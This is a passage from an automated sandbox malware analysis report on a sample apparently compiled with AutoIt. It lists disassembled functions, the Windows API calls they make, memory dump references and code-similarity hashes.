                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 02e835a1fffff1885316a6049469f4ec63b7682f77f2484633ecc56fa9a7434f
                                      • Instruction ID: 0b6bdf019057083410872b657de7990fbdc28e03c78903cb030cd28e7ce7eb18
                                      • Opcode Fuzzy Hash: 02e835a1fffff1885316a6049469f4ec63b7682f77f2484633ecc56fa9a7434f
                                      • Instruction Fuzzy Hash: 77322832A041958FDF28CF2AC4D067E77A1EB46312F28856BD4998B391D23CDD83DB49
                                      Function 00497920 Relevance: .6, Instructions: 563COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5781820a078c2dc24ff641843ccac11cf50ff3b3b78b1a05ce3ee7cd2805a45b
                                      • Instruction ID: 5844f1b7e8f9fa260f2715c3fb2f52439ecb23fa6690c2d51f5fdbbdb66ebeca
                                      • Opcode Fuzzy Hash: 5781820a078c2dc24ff641843ccac11cf50ff3b3b78b1a05ce3ee7cd2805a45b
                                      • Instruction Fuzzy Hash: 2522BDB0A006099FDF14CFA9D891AAEB7B1FF44304F10452BE816A7391EB39ED15CB59
                                      Function 004991C0 Relevance: .5, Instructions: 475COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c8d98cd2b4b53beecfc5c64c389331bdafb5ab131023b47ab9c371b7c0681c69
                                      • Instruction ID: 12fe589504b6075cc802ab3f743480db3d76b15fa1e6a31b755a5c61d8a0fceb
                                      • Opcode Fuzzy Hash: c8d98cd2b4b53beecfc5c64c389331bdafb5ab131023b47ab9c371b7c0681c69
                                      • Instruction Fuzzy Hash: 6102E9B0A00205EBDF04DF55D851AAEBBB1FF54304F11856BE8069B390E739ED15CB99
                                      Function 004B7A4A Relevance: .2, Instructions: 237COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 236731db7fa9ce81f04f2f49ce4d4a465c5e02391f7bd7b9b6e843873a08ee29
                                      • Instruction ID: 6735b4ae8f31832a1e797706e4dce5ef06318510bd954dd029caa6b7ab7eb187
                                      • Opcode Fuzzy Hash: 236731db7fa9ce81f04f2f49ce4d4a465c5e02391f7bd7b9b6e843873a08ee29
                                      • Instruction Fuzzy Hash: A061256120C70566DA7499288895BFF3398DFD5708F14091FE942DB382D51DAE42CB3E
                                      Function 00512ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00512B30
                                      • DeleteObject.GDI32(00000000), ref: 00512B43
                                      • DestroyWindow.USER32 ref: 00512B52
                                      • GetDesktopWindow.USER32 ref: 00512B6D
                                      • GetWindowRect.USER32(00000000), ref: 00512B74
                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00512CA3
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00512CB1
                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512CF8
                                      • GetClientRect.USER32(00000000,?), ref: 00512D04
                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00512D40
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512D62
                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512D75
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512D80
                                      • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512D89
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512D98
                                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512DA1
                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512DA8
                                      • GlobalFree.KERNEL32(00000000), ref: 00512DB3
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512DC5
                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,0052FC38,00000000), ref: 00512DDB
                                      • GlobalFree.KERNEL32(00000000), ref: 00512DEB
                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00512E11
                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00512E30
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00512E52
                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0051303F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                      • String ID: $AutoIt v3$DISPLAY$static
                                      • API String ID: 2211948467-2373415609
                                      • Opcode ID: 2c8d28a03a0fe583c3007bb4b13f690ee6cf9a3284b8752162bf626aa85ca030
                                      • Instruction ID: 522d12a3a514ec4a5bc3c9b577e65c07f2b4eba0f7802d04011bbf63ac0d809e
                                      • Opcode Fuzzy Hash: 2c8d28a03a0fe583c3007bb4b13f690ee6cf9a3284b8752162bf626aa85ca030
                                      • Instruction Fuzzy Hash: 2A026971A00204AFDB14DF68CC89EAE7FB9FF49314F048518F915AB2A1CB74AD45DBA0
                                      Function 005270D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTextColor.GDI32(?,00000000), ref: 0052712F
                                      • GetSysColorBrush.USER32(0000000F), ref: 00527160
                                      • GetSysColor.USER32(0000000F), ref: 0052716C
                                      • SetBkColor.GDI32(?,000000FF), ref: 00527186
                                      • SelectObject.GDI32(?,?), ref: 00527195
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 005271C0
                                      • GetSysColor.USER32(00000010), ref: 005271C8
                                      • CreateSolidBrush.GDI32(00000000), ref: 005271CF
                                      • FrameRect.USER32(?,?,00000000), ref: 005271DE
                                      • DeleteObject.GDI32(00000000), ref: 005271E5
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00527230
                                      • FillRect.USER32(?,?,?), ref: 00527262
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00527284
                                        • Part of subcall function 005273E8: GetSysColor.USER32(00000012), ref: 00527421
                                        • Part of subcall function 005273E8: SetTextColor.GDI32(?,?), ref: 00527425
                                        • Part of subcall function 005273E8: GetSysColorBrush.USER32(0000000F), ref: 0052743B
                                        • Part of subcall function 005273E8: GetSysColor.USER32(0000000F), ref: 00527446
                                        • Part of subcall function 005273E8: GetSysColor.USER32(00000011), ref: 00527463
                                        • Part of subcall function 005273E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00527471
                                        • Part of subcall function 005273E8: SelectObject.GDI32(?,00000000), ref: 00527482
                                        • Part of subcall function 005273E8: SetBkColor.GDI32(?,00000000), ref: 0052748B
                                        • Part of subcall function 005273E8: SelectObject.GDI32(?,?), ref: 00527498
                                        • Part of subcall function 005273E8: InflateRect.USER32(?,000000FF,000000FF), ref: 005274B7
                                        • Part of subcall function 005273E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005274CE
                                        • Part of subcall function 005273E8: GetWindowLongW.USER32(00000000,000000F0), ref: 005274DB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                      • String ID:
                                      • API String ID: 4124339563-0
                                      • Opcode ID: f6a62b28b8191d3a9069908470ca4823555b4e54de2660283d2d80884f47af2e
                                      • Instruction ID: 0f9884b5245adf6d70d12f3cc6b36259ee7c781490d6db54b3489bef53414101
                                      • Opcode Fuzzy Hash: f6a62b28b8191d3a9069908470ca4823555b4e54de2660283d2d80884f47af2e
                                      • Instruction Fuzzy Hash: E7A1AF72108315AFD720DF60DC48A6F7FA9FF5A320F100A19F962961E2D770E949DB92
                                      Function 00512711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(00000000), ref: 0051273E
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0051286A
                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 005128A9
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 005128B9
                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00512900
                                      • GetClientRect.USER32(00000000,?), ref: 0051290C
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00512955
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00512964
                                      • GetStockObject.GDI32(00000011), ref: 00512974
                                      • SelectObject.GDI32(00000000,00000000), ref: 00512978
                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00512988
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00512991
                                      • DeleteDC.GDI32(00000000), ref: 0051299A
                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 005129C6
                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 005129DD
                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00512A1D
                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00512A31
                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00512A42
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00512A77
                                      • GetStockObject.GDI32(00000011), ref: 00512A82
                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00512A8D
                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00512A97
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                      • API String ID: 2910397461-517079104
                                      • Opcode ID: 3722c7d3d611440998be1eb313e31b71f23d1b20a154d3b668a8b9a4ac4c93c4
                                      • Instruction ID: 215196b32e8e7a927376004c405cc0940e8c12dbb068aed99a0a0462c1fd8835
                                      • Opcode Fuzzy Hash: 3722c7d3d611440998be1eb313e31b71f23d1b20a154d3b668a8b9a4ac4c93c4
                                      • Instruction Fuzzy Hash: DAB18A71A00205AFEB24DF68CC4AEAE7BA9FF09714F008519F915E72A1D774ED44CBA4
                                      Function 00504ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00504AED
                                      • GetDriveTypeW.KERNEL32(?,0052CB68,?,\\.\,0052CC08), ref: 00504BCA
                                      • SetErrorMode.KERNEL32(00000000,0052CB68,?,\\.\,0052CC08), ref: 00504D36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                      • API String ID: 2907320926-4222207086
                                      • Opcode ID: 495bb3d55567a76db6678744bfa43234438e4c40525c73e5f410cdc2cc52dbfd
                                      • Instruction ID: 1a937326c9c2610fa34480cc61618c7f1fa7735c8012986c8d1a13c1f97eedb4
                                      • Opcode Fuzzy Hash: 495bb3d55567a76db6678744bfa43234438e4c40525c73e5f410cdc2cc52dbfd
                                      • Instruction Fuzzy Hash: 2761EFB0601106EBDB04DF24CA9297C7FB0BB45345B68882AFE06AB2D2CB35ED45DF41
                                      Function 005273E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 00527421
                                      • SetTextColor.GDI32(?,?), ref: 00527425
                                      • GetSysColorBrush.USER32(0000000F), ref: 0052743B
                                      • GetSysColor.USER32(0000000F), ref: 00527446
                                      • CreateSolidBrush.GDI32(?), ref: 0052744B
                                      • GetSysColor.USER32(00000011), ref: 00527463
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00527471
                                      • SelectObject.GDI32(?,00000000), ref: 00527482
                                      • SetBkColor.GDI32(?,00000000), ref: 0052748B
                                      • SelectObject.GDI32(?,?), ref: 00527498
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 005274B7
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005274CE
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 005274DB
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0052752A
                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00527554
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00527572
                                      • DrawFocusRect.USER32(?,?), ref: 0052757D
                                      • GetSysColor.USER32(00000011), ref: 0052758E
                                      • SetTextColor.GDI32(?,00000000), ref: 00527596
                                      • DrawTextW.USER32(?,005270F5,000000FF,?,00000000), ref: 005275A8
                                      • SelectObject.GDI32(?,?), ref: 005275BF
                                      • DeleteObject.GDI32(?), ref: 005275CA
                                      • SelectObject.GDI32(?,?), ref: 005275D0
                                      • DeleteObject.GDI32(?), ref: 005275D5
                                      • SetTextColor.GDI32(?,?), ref: 005275DB
                                      • SetBkColor.GDI32(?,?), ref: 005275E5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1996641542-0
                                      • Opcode ID: a638b9e4392bf3d95b7b1e9cce33d90bbb5fe62bcc0949294f66b59830312b11
                                      • Instruction ID: ab12edef8119e4518550579d56a6b92dc83c91177310a2a7f9a875c77a013910
                                      • Opcode Fuzzy Hash: a638b9e4392bf3d95b7b1e9cce33d90bbb5fe62bcc0949294f66b59830312b11
                                      • Instruction Fuzzy Hash: F1616C72900228AFDF11DFA4DC49AAEBFB9FF0A320F104115F911AB2A2D7749945DB90
                                      Function 00520FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00521128
                                      • GetDesktopWindow.USER32 ref: 0052113D
                                      • GetWindowRect.USER32(00000000), ref: 00521144
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00521199
                                      • DestroyWindow.USER32(?), ref: 005211B9
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 005211ED
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0052120B
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0052121D
                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00521232
                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00521245
                                      • IsWindowVisible.USER32(00000000), ref: 005212A1
                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 005212BC
                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 005212D0
                                      • GetWindowRect.USER32(00000000,?), ref: 005212E8
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 0052130E
                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00521328
                                      • CopyRect.USER32(?,?), ref: 0052133F
                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 005213AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                      • String ID: ($0$tooltips_class32
                                      • API String ID: 698492251-4156429822
                                      • Opcode ID: 9f1091af2c22b583aba530791875eb234055d4759a8ee3959c9bf202d25e6aca
                                      • Instruction ID: f72eb0a2785288bf89fd0996a7ccfa6d0afc47a28f54178613ba6303c526bae3
                                      • Opcode Fuzzy Hash: 9f1091af2c22b583aba530791875eb234055d4759a8ee3959c9bf202d25e6aca
                                      • Instruction Fuzzy Hash: F6B19971604350AFDB10CF25D888A6BBFE5FF99354F00891DF9899B2A2C731E805CB99
                                      Function 00520241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 005202E5
                                      • _wcslen.LIBCMT ref: 0052031F
                                      • _wcslen.LIBCMT ref: 00520389
                                      • _wcslen.LIBCMT ref: 005203F1
                                      • _wcslen.LIBCMT ref: 00520475
                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 005204C5
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00520504
                                        • Part of subcall function 004AF9F2: _wcslen.LIBCMT ref: 004AF9FD
                                        • Part of subcall function 004F223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004F2258
                                        • Part of subcall function 004F223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004F228A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
